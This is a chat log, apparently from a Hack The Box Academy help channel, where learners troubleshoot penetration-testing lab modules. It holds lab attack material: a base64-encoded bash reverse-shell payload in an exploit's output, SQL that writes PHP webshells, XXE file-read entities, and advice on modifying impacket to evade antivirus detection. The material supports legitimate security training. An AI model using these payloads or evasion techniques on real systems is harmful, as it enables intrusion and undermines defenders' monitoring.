#modules
I tried with -Pn and -n and -sT. No luck.
I was able to get proxychains nmap working when running in a root shell (a real shell, not just sudo):
kali@kali:~$ sudo -i
root@kali:~# proxychains nmap -sT 172.16.5.1-100 -n -p3389 --open 2> /dev/null
Starting Nmap 7.94SVN ( https://nmap.org ) at 2024-06-06 13:21 PDT
Nmap scan report for 172.16.5.19
Host is up (0.020s latency).
PORT STATE SERVICE
3389/tcp open ms-wbt-server
Nmap done: 100 IP addresses (100 hosts up) scanned in 364.58 seconds
root@kali:~# proxychains nmap -sT 172.16.5.19 -n -p3389 --script *rdp* 2>/dev/null
Starting Nmap 7.94SVN ( https://nmap.org ) at 2024-06-06 13:29 PDT
Nmap scan report for 172.16.5.19
Host is up (0.020s latency).
PORT STATE SERVICE
3389/tcp open ms-wbt-server
| rdp-ntlm-info:
| Target_Name: INLANEFREIGHT
| NetBIOS_Domain_Name: INLANEFREIGHT
| NetBIOS_Computer_Name: DC01
| DNS_Domain_Name: inlanefreight.local
| DNS_Computer_Name: DC01.inlanefreight.local
| DNS_Tree_Name: inlanefreight.local
| Product_Version: 10.0.17763
|_ System_Time: 2024-06-06T20:30:03+00:00
| rdp-enum-encryption:
| Security layer
| CredSSP (NLA): SUCCESS
| CredSSP with Early User Auth: SUCCESS
| RDSTLS: SUCCESS
| SSL: SUCCESS
|_ RDP Protocol Version: RDP 10.6 server
Nmap done: 1 IP address (1 host up) scanned in 9.85 seconds
It takes quite a while to run, but at least it kind of works.
Module: AD Enum Att Skills Assess II.
Anyone recall splitting any files for transferring tools outside of a 'cert'ain tool? Just looking for confirmation. Thanks! If not, I'm curious either way.
Didn't use anything like that
The writeup uses it, it's just one of many tools
Apply the concepts taught in this section to obtain the password to the Vendor user account on the target. Submit the clear-text password as the answer. (Format: Case sensitive) Attacking LSASS
I tried everything, any help 😦
Could be that your lsass is corrupted, I'd rm all the lsass files and transfer again
Also you don't need to be root
I don't know if this is the reason or not, but in the section the process has three files or sub-processes, but when I RDP in to create the dump file for LSASS I see only two
This is in the lesson , Does it matter ?
¯\_(ツ)_/¯
Does anyone else take a huge amount of notes and rely on repetition in terms of popping boxes to learn/remember things?
Definitely, taking notes is important.
And in terms of repetition with just doing the thing... Popping boxes... That's more helpful than just re-reading the course content right?
For the CPTS I mean.
I mean you can take your own notes from the modules and format them in such a way that works best for you
If you complete the module, you retain access to it afterwards (if done during a subscription), so can always refer back, but always useful to take your own notes as you go, as it's good practice for when you start to go up against either the HTB Labs, or against the Exams
Right, okay.
I just feel a bit insecure because I'm not remembering everything. But yeah I'll get through it.
Any module you buy is yours forever :D
I barely remember half the things aside from the common tools I use, nmap, xfreerdp
And ssh
a good portion of other stuff is just notes ¯\_(ツ)_/¯
^
Good to know. Thanks Marcie.
Yeah, I meant the modules you unlock if you have a subscription like annual. Those you complete, you keep access to after the sub ends
ohhhh ye
If you unlock with cubes, then yes you keep them
if you complete the CPTS path under an annual sub you keep all the modules
yup
The proxychains was set up fine, I could scan the target host with proxychains Nmap. The issue was the RDP connection would die almost immediately. I had a chat with support and used a tip from Ryuki about a timeout. Once I set a timeout to 10000ms and network connection to Broadband, I could RDP properly
It doesn't matter
There might be higher chances of that type of file in real world.
marcie speaks the truth, creating your own documentation is absolutely critical imo
what trees?
you ran the same prebuilt query?
servers seem kinda borked right now
i'm having big problems on US servers, EU seems better but still isn't working
that should return extended edges too iirc, but it's been a while since I've used the legacy version
which module
me or siffer?
Module: Cross Site Scripting > Discovery
I am trying to install the dependencies for XSStrike and I am having difficulty installing fuzzywuzzy. I've tried `pip install`, `python -m pip install` and `python3 -m pip install`, with and without sudo, as well as apt-get, and even cloning the git repo itself to try and install it manually. Every attempt to install is failing. Using the install commands, the installation process appears to hang. When installing manually it seems to fail to compile. Any advice?
I am not using the pwnbox, I am using Kali
you
Windows attacks & defense
wait for like 5 mins
HTB AD Skill Assessment 2
Submit the contents of the flag.txt file on the Administrator Desktop on the MS01 host
I got a user * * * * *svc and a clear-text password, but I can't do anything with it. Tried evil-winrm on the host and it didn't work. Any ideas?
tried us and eu
US couldn't even remote in after 10 mins, EU let me in once, but the box got that trust error like it disconnected from the domain.
welp bad time to be doing modules I guess
but that module has been pretty slow to begin with
I'm stuck on AD Enumeration & Attacks - Skills Assessment Part I question 4. I managed to kerberoast the user in Q3 and can get a reverse shell on the pivot host but can't seem to get any further. All of the users that I try seem to not have permissions to do anything on AD. I can get Ligolo-ng running on the pivot and get to the DC but can't seem to find anything of interest on that. The webshell and reverse shell on the pivot are running as local admin but I still can't seem to get to the domain. Can anyone give me some pointers?
check what services that account can access, the name should be a pretty big hint
@cloud urchin could you raise a ticket with support stating what you're experiencing? I'm afraid there is reduced support capacity outside of core EU time zone, but at least someone will be able to pick it up tomorrow and do some testing / checking. Apologies for the inconvenience caused 😦
It's been going on the past few weeks
Someone mentioned they opened a ticket for this and they said they were aware and working on it
I'll pass the image you provided on to the academy module team internally also
i posted another one above, it did let me connect one time but got kicked shortly after. box is having domain trust issues with the DC.
it seems to really be affecting any module that also contains an internal vlan with more hosts
check for access with the accounts that you have
yeah has been a thing for at least the past week, at least for the US servers
Understood
its ok i still love htb
I think it's been happening for several weeks now, I recall people begin to complain here about the EU region, we advised to go to US and it fixed it, and now it seems to be the reverse, EU appears up most of the time, however right now I'm having issues with both.
I'm opening a ticket and writing all this in there too
I'm having issues with Attacking Common Apps Skill Assessment 1.
It says the payload was sent, but no session was created.
I tried it about 20 times.
I ended up following the guide step-by-step, so I don't believe it's user error.
whew, respawning the box 3 times got me a different IP, it seems to be letting me connect (US region)
Could you pass me the IP in DM please?
Curious whether there's an issue with a particular node there
So, i got this credential and another local admin hash from SQL01 host, using xp_cmdshell. Tried another enumerations on that host and got nothing. Now i did RDP into MS01 using * * * * *svc user, but when i try to transfer mimikatz to the host, the connection drops. Right now i'm really roasted with this question
have you checked the rights of that user in ms01?
What is the function of & in nc?
nc -nvlp 9001 &
[+] Extract login nsp token : 9334348aa282e0f96e03acb637b7da8dc52faef73e84cc6a7e6976044fe7a0c1
[+] Login ... Success!
[+] Request upload form ...
[+] Extract upload nsp token : b28f8c661b0a8c023efbb776121c8269bf4113ee3e7cfb6786f8f547e5016986
[+] Base64 encoded payload : ;echo YmFzaCAtaSA+JiAvZGV2L3RjcC8xMC4xMjkuMjAxLjkwLzkwMDEgMD4mMQ== | base64 -d | bash;#
[+] Sending payload ...
[+] Check your nc ...
[1] + done python3 49422.py http://monitoring.inlanefreight.local nagiosadmin 9001
nc isn't catching the shell. nc isn't doing anything.
Thank you gubarz
If you have time, may I DM you with where I'm at? I just verified anything over 1.4K doesn't write to stream
I'm just going to plug in the answer since I doubt this is on the test. But I've got to be honest, the fact that I'm following your guide and it still isn't working is encouraging me to skip around and guess at everything.
How am I supposed to know whether or not I'm doing things correctly when your platform is busted even when I follow your guide?
The purpose of the & symbol is explained in a previous module
Alright well, when I use it nc closes.
I say this with the utmost respect, the CPTS is really awesome but your platform has been messed up lately.
People's time is very valuable, and if your platform isn't responding the way your guide says it should...this provides an awful lot of confusion.
Im using nc bg'd as we speak, make sure its still running however. Sometimes it'll stop
Yeah.
I dunno, you guys are still better than OffSec. But I hope that the CWEE doesn't require me to restart a VM 50 times.
I'm literally plugging in answers and taking notes because things aren't working.
I'm sorry to hear that - we do accept feedback with the /feedback command, or through our support staff via https://help.hackthebox.com. I'd love to stay up and help, but it's now 4AM again, so I need to get a bit of sleep
It's hard enough to get this stuff right when the platform is dependable.
I'm not taking any more time to give feedback. I've given you my money and again, you're better than OffSec.
It's just how it is.
I'm moving on to Linux Privilege Escalation, if I can't get a shell to pop in there...lol
I would definitely say HTB infra is at least 10x better than Offsec lol
I give them that.
Their content is amazing and I've learned a TON.
But when I go to study if the platform is down, that's my TIME and my EFFORT being wasted.
UriEl what's your completion %? (I'm 99.56%)
All I have left is Privilege Escalation Linux/Windows and Attacking Enterprise Applications.
And again I have every intention of moving on to the CWEE.
It's just really sad when I can't trust the platform to tell me when I'm screwing up. That's a BIG problem.
Maybe that module just sucks...Linux Priv Esc is working.
But yeah, I tried to be respectful. I love HTB and the CPTS 🙂
Very good value etc...
Mind dming me?
This really isn't the spot for feedback as other users are equally working on the same path
Maybe a feedback channel would be a good idea.
But yeah I'm done complaining, I am sure I was doing things correctly. The platform is just messed up at the moment.
The real scary thing is what if the test glitches on me?
That is what I'm most afraid of, and I hope that that area of the platform is dependable.
If anything I used a post request back to one of my http servers
See above
password attacks > attacking active directory & NTDS.dit
Capture the NTDS.dit file and dump the hashes. Use the techniques taught in this section to crack Jennifer Stapleton's password. Submit her clear-text password as the answer. (Format: Case-Sensitive)
It should show the hashes right?
when running the crackmapexec smb {IP} -u jmarston -p {pass} --ntds. but for mine, it does not prompt anything
Hi guys!! I've just finished my AD Enum & Attacks module. Question 4 of assessment 2 needs me to figure out one credential. After struggling to find the cred, I tried the same password from the password spraying section and got a cred. I doubt that I used the right way, so I double-checked with the walkthrough and the password just comes up from password spraying without any specific way to find it. Am I missing something, or is that the real scenario out there, that we just guess the password? Sorry if this question bothers you, I have no experience in this field so I'm really curious about this
the --ntds for CME is DCSync, to dump the local NTDS.dit file, you'll need to get a shell on target
spray with the common passwords mentioned in the module
Just looked at your screen shot, sorry thought you were trying to go the other way. Yeah if you're still around you can dm
Still needing assistance with this if anyone has an ideas.
What's the error message when you pip install?
I receive an error about a directory being inaccessible and it's defaulting to the home directory. Then it freezes up, no further output and no apparent activity.
If I run it with sudo, I don't get the error regarding the directory, but it still freezes up
Does it do it with other packages?
I only have one account so far, or am I re-using the accounts that I found in the exercises?
Hi, I am doing Skills Assessment of the Pivoting module. I got access to the first pivot Windows server 172.16.x.x. From there, I needed to find second pivot. I did ping sweep but it returned false.
No, the rest of the module will have no bearing on the assessment. You have an account, check for where else you can use that account.
I checked the forums after nothing worked and it revealed one machine to which when I ping, gives response.
The Test-Connection command is also returning True right now
But when I was trying within loop earlier, it had returned False
Why? 😦
How am I supposed to know if similar things happen during exam?
The various paths (https://academy.hackthebox.com/paths/jobrole) map to the certifications
yes, with everything using pip it freezes
You should have something return, what command did you run for the for loop? You can wrap it in spoiler tags or DM the command.
||1..254 | % {"172.16.6.$($_): $(Test-Connection -count 1 -comp 172.16.6.$($_) -quiet)"}||
You can try removing it from your home directory? Or try this? /usr/bin/python3 -m pip install fuzzywuzzy
I'll try this and get back to you
Mind if I dm you?
Sure
That one seemed to work, thank you very much
the one that you found for that assessment
I have executed the same command again, and this time it gives me True for the same IP address where it had returned False. Can anyone explain why this happened? @shut quest suggested that this might have happened because ICMP requests are unreliable and the server might not have responded. So, what are my alternatives to make this request reliable?
There's multiple issues that could make this unreliable. Your best bet is simply upping your count, if you want to rely on ICMP alone. Another option would be to test common ports, instead of just using ping, in order to identify devices. You could sweep the subnet for port 22, to try to find linux hosts, for instance. 445/139 for windows.
Thanks for the input.
That is why I suggested nmap over a ping sweep, a top 20 should provide a high hit chance without taking much time.
nmap to port 22?
if you're doing the ping sweep from a windows machine , i would recommend this Get-Pingsweep.ps1 powershell script
--top-ports 20 or if you just want what rat said -p 22,139,445
and nmap can already internally handle doing full subnets, so you don't have to make any special loops or anything
for this we need more than one ping
first ping might not get a response , because the target will ARP broadcast
and ask who you are
Or might even be blocking ICMP.
yes, also very common
Now that I check the module again, this is actually written there as well.
That is a fancy script , I like my one liners, but I'll keep this.
HTTPS/TLS ATTACKS
Heartbleed Bug
How long did you have to try? I've been trying for an hour to get the result 😅
Hi guys,
I have a question about "Documentation & Reporting" module.
I couldn't open the zip files containing the obsidian notebook and the report
Can anyone check if the files are good ?
Thanks but not working for the sample report pdf and docx
👍🏿
Can anyone help me?
Unable to build ptunnel-ng with autogen.sh
Check if this can help, otherwise payloadbunny posted the compiled versions one message above
bruh
How long ago did you spawn it?
eu academy 5
Thanks
will the certificate generated change everytime?
i used certificate from a previous time and it seems to give error on rubeus
nvm it works fine now
I'm stuck in the NoSQL injection skill assessment 2,
i'm trying to test the nosqli payloads like $regex etc... when content-type: x-www-form-urlencoded, failed
i'm trying SSJI payloads also. failed as well.
I tried in /login, /forgot and /reset url. all failed. what to do now ?
I also tried with change the content-type to json and pass an json data in the req body, the response said missing that_parameter ...
Try to find a field where you receive a response after you have submitted the form. Take a close look at the answer. Change the input and look at the answer again
I only find /forgot giving a response "the pass reset link has been sent" when I pass the username [got from the placeholder]
then stuck
Hey has anyone done the file upload attacks module?
DM
There are other forms with feedback
hi menace bunny
see your message box
oh really? let me get that
I didn't get that. Where did you find it?
You have listed three forms. Which of them give you feedback when you enter something?
/forgot
For which form field could you find data that is fairly certain to be correct?
Not only
Module: Attacking Common Services - Easy
You are targeting the inlanefreight.htb domain. Assess the target server and obtain the contents of the flag.txt file. Submit it as the answer.
I've gotten access to the database and ran the following command:
```sql
SELECT '<?php system($_REQUEST["cmd"]); ?>' INTO OUTFILE 'C:\xampp\htdocs\shell.php';
```
I then started a listener on my attack host on port `1234`.
I then visited this URL in the browser `http://10.129.37.231/shell.php?cmd=` and inserted my payload after that. I didn't get a reverse shell. I ensured to use a Windows payload and even URL encoded it.
Also, if I try visiting the URL with the `whoami` command as a parameter, it doesn't give me an output. I get what's shown in the screenshot instead.
change the quotation marks.
Use `"` for SQL
Use `'` for PHP
Changed it like you suggested but still doesn't seem to work 😕
There is one other option apart from System($_Request . Try it with this
Hello everyone, help me complete this module. Plizz
where are you stuck at?
Still doesn't work.
In the Footprinting medium lab, I mounted the NFS share with this command `sudo mount -t nfs 10.129.202.41:/ ./target-nfs/ -o nolock`. The NFS share got mounted, but I got a "Permission denied" error when traversing it. With `ls -n` I got this UID "65534". When I was creating a user with that UID, it already existed with the username "nobody", and I can't even switch to that user, it says "account currently not available". Also I can't delete that user to create it again!!
Don't use system($_REQUEST). Use something different
$_GET
sudo is not the same as root
meaning
The section actually uses this command:
SELECT "<?php echo shell_exec($_GET['c']);?>" INTO OUTFILE '/var/www/html/webshell.php';
But I'm not sure how to access this webshell and make it run my command since it uses $_GET. Do you know how?
You have to run it as root, not as a user with sudo rights
Exactly the same as with the System
i see, thanks
Ahhh okay, I'll try it out, thanks.
?c=<command>
can you give me an example command
The exact same command (without sudo), but you must be root. It's about the UserID. It must be the same. Root = 0
Module: ATTACKING ENTERPRISE NETWORKS
Topic: Lateral Movement
Question: Obtain the NTLMv2 password hash for the mpalledorous user and crack it to reveal the cleartext value. Submit the user's password as your answer.
I have the hash but hashcat is giving me a token length exception. I can see it's clearly bigger than the hashes on the hashcat example but not entirely sure how to cut it down?
UPDATE: If anyone reads this in the future, if you are getting the token length exception it can be down to an encoding issue. Just run dos2unix to convert the file from UTF-16LE to UTF-8 and it should function fine. You will also see the difference in file size once this is done; it will go from a file of around 1.7kb to 7-800b.
i see
Still didn't work.
Adding to what the Buddy said, NFS uses file-based permissions, meaning there is no server-side check. So long as your UID/GID matches the permissions, you will have free range.
thanks
Then try to change \ to / like c:/blahblah
This finally worked. Thanks
And if forward slashes don't work, escape your backslash c:\\
I should've left the command the same 🤦♂️
The forward slashes worked, thanks for your suggestion.
without sudo it gives error "mount.nfs: failed to apply fstab options"
i am using the same mount command without sudo
with root, not with your user
😩
su root
thanks
Anyone give me a nudge with this hash formatting issue?
Well, the hackthebox pwnbox doesn't have root permission, meaning it asks for a password. I did the same without root in the NFS section in Footprinting and it worked without any issue. The problem only occurs in the Footprinting medium lab. Maybe I am not allowed in there, and the flag is somewhere else??
Creds are on the Desktop
cheat and do sudo su but there's creds to the box on the desktop
oooo, thanks
I cannot repeat what is written even in the module examples.
Use either method from this section to read the flag at '/flag.php'. (You may use the CDATA method at '/index.php', or the error-based method at '/error').
only these commands are received
<!DOCTYPE email [
<!ENTITY corporate SYSTEM "php://filter/convert.base64-encode/resource=index.php">
]>
<!DOCTYPE email [
<!ENTITY corporate SYSTEM "file:///etc/passwd">
]>
I'm losing my mind trying to figure out the issue with this inveigh ntlmv2 hash. I have ran inveigh multiple times and still get the same hash, but unsure how to crack?
Okay , so I am working on the only question of this section module(https://academy.hackthebox.com/module/33/section/183):
"Connect to the database using the MySQL client from the command line. Use the 'show databases;' command to list databases in the DBMS. What is the name of the first database? "
I typed the command `||mysql -u root -h 94.237.54.176 -P 52537 -p||` and once I was in the database, I typed `show databases;` and submitted the first database in the 'Database' table
I removed white spaces and when I submitted my answer, it still wasn't accepted.
Never mind. For whatever reason, HTB now decided my answer was acceptable (despite not changing anything)
Wasn't really sure where to ask this question so I decided to ask here. I've configured my tmux to use vi keybinds for copy-mode. I understand how to highlight text in the terminal now but when I copy using Enter after selecting the text, it copies the text only to the buffer of copy mode, how do I copy to system clipboard?
Hopefully that makes sense 😅
are you using x11 or wayland?
x11
should already be in the clipboard
wait are you in a vim session too?
as in 1 window vim 1 window terminal etc
Maybe I'm not using x11 then? 💀
I'm just running a basic installation of kali.
No, I'm not in vim. I've launched tmux, entered a bunch of commands and then entered copy-mode. I've highlighted text and when I use the keybind Enter to copy the selected text and exit copy-mode, it doesn't copy it to clipboard.
If you are running basic installation it still uses x11
Alrighty
Say I copy something like this and click Enter, it doesn't copy to clipboard.
are you using the tmux plugin manager or something else?
Nothing, this is a fresh install of Kali.
My conf file.
another questions do you mean to the global clipboard or just kali's?
as in is this in a vm and you want it in global clipboard?
Just Kali.
I've already configured my VM to be bidirectional, so it should copy to both either ways, at least that's been the behaviour for everything else.
Just can't get text from copy-mode to the Kali's clipboard for some reason.
take a look at this
https://github.com/tmux/tmux/wiki/Clipboard
Alrighty, thanks.
plugin manager is also good if you get a chance
Noted
I tried the set-clipboard doesn't work, gonna give the other method a shot.
Any particular plugin you'd suggest?
at work at the moment but you can see my config here https://github.com/mdb-dev-io/mydotfiles/blob/main/dotfiles/config/tmux/README.org
Pluggins are near the bottom
You'll need to get the plugin manager too
I tried the other method from the official docs and still didn't work 😕
have you rebooted your vm since making the changes
I've gotta reboot...? I thought if I killed the tmux session it'd be enough.
The first method didn't actually require me to make any changes to my configuration which I found to be quite odd.
The second method involved me only adding one line to the conf file.
mate, I am trying to help. Fundamental rule of troubleshooting "if in doubt reboot"
Alrighty, I'll give it a go rn.
Has anyone encountered the issue with Inveigh where hashcat has the token length exception with the hash? I've seen this https://github.com/Kevin-Robertson/Inveigh/issues/24 and tried adding the challenge but can't get it to work
It's in reference to Module: ATTACKING ENTERPRISE NETWORKS
Topic: Lateral Movement
Question: Obtain the NTLMv2 password hash for the mpalledorous user and crack it to reveal the cleartext value. Submit the user's password as your answer.
my computer is on fire do i just restart?
That's not troubleshooting, that's negligence
my computer has now summoned demons do i force a shutdown?
no, shout "Hail Satan"
it is now floating you lied to me
You have to cast it to a signed int so it'll behave. This is basic daemonology come on!
UNSIGNED INT 💩!!! Please tell me you didn't cast it to a signed int. Oh no...
Oh C, Lord of Chaos. Pity us mere mortals.
Guys, does the HTB Monthly Gold subscription to the academy cover TIER III?
hi, I need a small nudge for the Hard skill assessment in the Abusing HTTP Misconfigurations module. Can I please dm someone?
Hi, I have a problem with my enrollment in the academy. Exactly 1 month ago I bought the student plan on HTB and I didn't want to renew the plan this month (it expired on June 3rd). Despite this, however, I can still see the modules that I have never done and I still have the "Student" rank. I don't think this is normal, right?
Can someone redirect me to official or perhaps specific support for this type of problem?
i would have said nun and keep the free stuff XD
If you purchase them with cubes I think they’re always yours
hahaha clearly I think it's illegal and I don't want to be charged
I still have student rank and can see modules I've never even seen. For the rest, yes, the ones I have already completed are clearly mine now
if they dont know it never happened 😂
but too late for u, u can contact support
its the green box on bottom right corner in academy
where can I contact him?
I have no button in the bottom right corner in academy
Ok I will test this thx
np
Do you mean does it give full access? No
Only gold annual gives access to t3 modules, gold monthly just gives cubes
Hey, thanks for the hint. Just got the flag. Tyvm 🙂
Thank you! 🙂
Looking at doing the CREST CPSA/CRT pathway 🙂
¯\_(ツ)_/¯
Idk what that full path cost (including the cube refund) looks like
T1+ modules give back 20% of spent cubes as/when you complete
7290 cubes in total
Can earn 1580 cubes from it I think
In total doesn't include the 20% from t1-3 modules within
Any t0 gives 100%
Probably better worth going for like 6-7 months of plat
Which gives 1k Cubes per month, and you'll likely spend enough time that you won't wait too long for the next cube deposit
Looks like further down on the list some of the modules cost 500 cubes
I'll do the 10 cube ones to start with as I got 60 cubes I can use now
then I'll prob get gold sub
Can only really dedicate an hour a night to it unfortunately
But its better than reading books, I learn by doing... lol
Yeah then doing a few monthly subs to rack up the cubes is best
Thanks Marcie 🙂
1 hour at a time though, you'll be done in 3 years
Ah give or take, may be a bit of extra time here and there, just how much I can push myself and fit it in
Hello this gonna sound so stupid but I am really lost in 3rd question in this module https://academy.hackthebox.com/module/147/section/1638 I tried like everything I can but nothing works for me, even checked the people trying to give tips but still I cant get it. If anyone has patience to tell me how to access shared folder for david, I would be happy, else I am going to sleep in front of my laptop whole time
@icy marsh I deleted your post because it almost shows the complete solution.
Have another look at the Blind data extraction section. You have made a mistake in the logic
You pth
As shown in the section
It may not reflect when you do whoami but you should be able to access the \\DC01\david\ share
so, after using mimikatz I should be able to see contents of shared folder?
The full filepath is \\DC01\david\david.txt
I really get confused, bc I remember like I tried it
Yes
alright I will do it again, thanks for help
If all else fails switch to EU vpn, as US seems to act up with some things
Note the hash passing method opens a whole new cmd/powershell session
omg, rn I feel so dumb... instead of writing `\\DC01\david`, I was writing `//DC01/david` 💀
Guys could I a sanity check please? 😄 I was just doing the BROKEN AUTHENTICATION Skills Assessment on Bug Bounty Hunter. I was deep into it and just finished crafting my attack. Went to launch my attack but the box had timed out. No panic so I clicked it to open fresh. However, now it's a completely different app/webpage. This one says "It's time to use bot in your server", the other one was like a very simple site with ability to send messages and log in/signup, a bit of a blog.
Can someone review my AEN report and give tips and pointers to make it better? I know I made a lot of mistakes that I'm not aware of 🙏
Report for?
for AEN as in a pentest report
Send it over
I'm so confused right now did HTB change the modules around or something because I was trying to find the flag and I can't even find the exercise
now it says I complete the section I was almost done with I was this close 👌
Some modules got batch updated
Something weird just happened to me. The assessment box timed out and when I opened it again, it was another app 😄
Thanks for letting us know 😄
I was just chatting with Jared the other day. For big updates they prefer to bulk change, especially if they're updating walk-throughs as well. As some were fairly outdated
Hi, did someone having problems to unlock a module using cubes?
Deactivate all AdBlockers
For the "Interacting with Users" section in Windows Privilege Escalation, I've placed a .scf file in the Private\IT directory as well as C:\ and C:\Windows, since the hint mentioned shares that the current user can write to, but I still haven't received a hash for the sccm_svc user. Am I doing something wrong?
nvm
Please do not publish any solutions
Anybody else working with their own Kali and having big problems with the VPN?
Lemme guess no network connectivity when using the vpn?
Network manager-->tun0 adapter-->only use resources on its network
no, i have connectivity. it laggs just very awful
Like regular internet connectivity or connection to boxes
If so, just try changing vpn regions and seeing if that fixes
I have already changed.... same problem. Regular internet works fine, just the ping to the boxes is slow, and the Windows machines which I connect to crash all the time
Reach out to support then
i just use the provided box...
Idk
ah I know why. I already had a pwnbox open from HTB, and the boxes receive the same IP
Ah, yeah, that'll do it
my own Kali machine and the box do receive the same IP
I didn't know that the instance and my own Kali machine get the same IP. One is in the cloud and with the other I set up a VPN. but ok, again something learned
They both use the same vpn pack to connect
aaah
It's why when troubleshooting many others tell you to turn off one when testing the other
The only time it doesn't matter is for the docker containers
public_ip:port
The logout button for the dashboard is not working...just fyi
Since you don't need the vpn to attack/access
Message support then ig
thx @fathom pendant
Or /feedback
when impacket smb gets blocked by AV, how could we evade it?
Smbclient? Or smbserver?
The simple thing is that windows sometimes doesn't like unauthenticated access
So you'd need to set a user/pass to access (if you're launching an smb server)
Also it wouldn't be AV, it'd be firewall
Or some GPO
How does one enumerate well and leave no stones unturned?
I've set up an SMB file server and tried to copy a file from my Windows to my Kali; Norton antivirus instantly blocked it with the message: Fake SMB Server Response blocked
likely bc it isn't set up with credentialed access ¯\_(ツ)_/¯
And Norton has a firewall
So again, not necessarily AV
Throw everything at it
question remains the same, how to get around it
Also, depending on your hypervisor you can just... transfer files
yes, logical, but I would be interested to know how Norton could be tricked 😉
Virtualbox has a file manager you can use to transfer files
Set up your smb server with credentials
As I'm saying, a lot of it deals with there being no credentials
Or go into Norton and allow the connection
¯\_(ツ)_/¯
haha, no that would be cheating
Brother, you're asking for ways around it. I'm telling you ways around it
alright sister
Since you trust this connection, allowing it is perfectly fine
And you can remove that White-list after
Otherwise google or #homelab-sysadm would be your best bet, not here
and I'm telling you that I'm more looking for a technical hack solution, not just turning off Norton 😉
but never mind
i will
And I didn't say "turn off norton"
I said "allow the connection"
As in White-list it
yes also not happy with allow or white list 😉
¯\_(ツ)_/¯
¯\_(ツ)_/¯
Then google it since it's out of scope for academy modules
Yes, sometimes it's necessary to be more curious than just working through the modules 😉 I'll google it
Find a way to transfer files through SMB in a way that does not trigger your antivirus. Maybe try Samba, or just Windows to Windows SMB transfers. Capture the packets and study what the traffic looks like when it's allowed. Then, do the same thing but with impacket-smbserver. There are dozens of labs in Academy where this is possible. Again, capture the packets and see what the traffic looks like when using impacket as the smbserver. I suspect there is some string, or pattern of bytes, that signifies that it's impacket (I'm not super familiar with the specifics of SMB). Then search through the source code and associated libraries used by the impacket smbserver, and remove/obfuscate what you suspect might be causing it to be identified.
Anyone ever work on a module and then it gets updated while you're doing it? I felt like I was going insane when I opened up the module and didn't recognize anything all of a sudden lol
Lmao that's a mood
Yeah it was a very confusing experience lol
Here, I found a video demonstrating how Suricata detects impacket SMB connections. Norton probably does something similar to determine what a "legitimate" SMB connection looks like
https://www.youtube.com/watch?v=65oJWoqXeRo
Impacket is a popular collection of Python classes for pentesters and attackers, allowing them to exploit various network protocols commonly used on Windows systems.
An SMB connection established by Impacket is fairly easy to detect on the network.
To download PAW Patrules rules collection for Suricata:
SELKS solution...
but this channel is for discussing Academy content
Hey, I'm stuck on the Preignition machine. I'm a beginner so I'm sorry for my questions, but I'm trying anyway, if anyone can help me. When I use gobuster I get this message and I can't find a solution. PLZ HELP
gobuster dir -w /usr/share/wordlists/dirb/common.txt -u 10.129.177.45
Error: error on parsing arguments: wordlist file "/usr/share/wordlists/dirb/common.txt" does not exist: stat /usr/share/wordlists/dirb/common.txt: no such file or directory
wrong channel bud, this is for HTB Academy modules. You'll have to verify your account to access the other channels.
so sorry!!
what does the error mean? In your opinion?
I think because I have any access to the wordlists. I try to check it by the command: locate wordlists or gobuster dir -w /usr/share/wordlists/ -u 10.129.177.45
you are telling gobuster to use a wordlist, /usr/share/wordlists/dirb/common.txt
the error is telling you that the file does not exist.
Can you think of a way to confirm or deny that?
I try this but I'm not sure: ls /usr/share/wordlists/dirb/common.txt
ls: cannot access '/usr/share/wordlists/dirb/common.txt': No such file or directory
same answer: No such file or directory (If it's bothersome to discuss this here, I can ask my question on another channel. Thanks again for the help)
Good Morning! Good Evening!
I am doing the Active Subdomain Enumeration module and have a question
Identify how many zones exist on the target nameserver. Submit the number of found zones as the answer.
For this question, I ran the command "dig axfr inlanefreight.htb @x.x.x.x" and got some DNS records
but how can I know the number of zones?
the fact that your command just returned DNS records, indicates you found the first zone
so what I need to do, is get all the domains from the records, and do "dig axfr" against each of them?
it works like
dig axfr <name of subdomain / potential zone> @<IP of DNS Server>
if I get dns records from any of the domains, that means there is another zone
so the target machine for the section is the DNS server. We will always keep @10.129.x.z in our dig commands
possibly. Dig axfr is requesting a zone transfer, and yours just worked
for inlanefreight.htb
so inlanefreight.htb is the first zone
so all of those subdomains that were revealed, after you did the first zone transfer. Try doing a zone transfer against those subdomains.
Thank you @west canopy
I kind of understand it now
i.e
dig axfr dev.inlanefreight.htb @10.129.74.20
whichever subdomains you found from the first zone
very clear guide
think of a DNS zone like a config file for the DNS server
when we do a zone transfer, we are asking for a copy of the dns servers zone file
if you wanna be extra fancy with it; since you see ns.inlanefreight.htb as the NameServer (NS) record you can add the ip ns.inlanefreight.htb to your /etc/hosts and do
#/etc/hosts
10.129.10.10 ns.inlanefreight.htb
#Command Line/Terminal
dig axfr app.inlanefreight.htb @ns.inlanefreight.htb
also as a general note whenever you see 127.0.0.1 on a DNS record, that means the related record (NS, A, MX...) is localhost to the DNS
so if you find a bunch of records all 127.0.0.1 on DNS you can safely add those to your /etc/hosts and the server should autoroute you to the appropriate related site
speaking of @west canopy, I find it kinda sad that DNS isn't more prevalent for the Footprinting Easy lab... but at the same time if you did a proper scan it doesn't matter
well we wanted to be sympathetic to the large number of IT professionals who have PTSD regarding DNS in general
so keep the DNS enumeration to a minimum
yeah, I keep getting surprised by the people that do the DNS enumeration part of that lab
I just skipped it
gonna sign off for a bit , happy hacking everyone 🙂
The above server employs Client-Side, Blacklist, Whitelist, Content-Type, and MIME-Type filters to ensure the uploaded file is an image. Try to combine all of the attacks you learned so far to bypass these filters and upload a PHP file and read the flag at "/flag.txt". Could someone help me on how to solve this? I've tried fuzzing with all the wordlists and didn't get anything to work with.
File upload attacks type filters
@west canopy @fathom pendant thanks
Not sure why I cannot add reactions to messages
Oh, I didn't know that
yeah HTB locks down unverified users, to reduce spamming of newcomers and whatnot
Thanks, will do verification when I back home
IMO an easier way to approach it besides just starting off with brute forcing, is to find a real picture that the site allows to be uploaded. When you do this, you instantly know what file type, mime filter, content-type, etc are all allowed with pretty much zero thought required. From there it's just finding how to get your shell into that format.
really a waste of time to brute force it all when you can simply upload a real pic 🙂
Sure, but what about fuzzing the content type & MIME bypass?
well as he said, and to expand on it, just upload a real picture with the extension
if you can successfully upload the file, then the file's mime type and content type are allowed through
yeah the the file type would probably need to be automated, but everything else you can infer from the file you uploaded
I see, fair enough, thank you
Is there any way to reset answers on a module section? I'm currently doing the Broken Authentication module. I started doing it yesterday, and between yesterday and today the module got updated. Now it says I've completed some sections, but the lab is completely different and it still has the old lab answer saved for the section, with no way of me putting in any new answer to complete the new lab
No, I don't believe so
It's something I believe the team is looking into
Okay cool appreciate the answer!
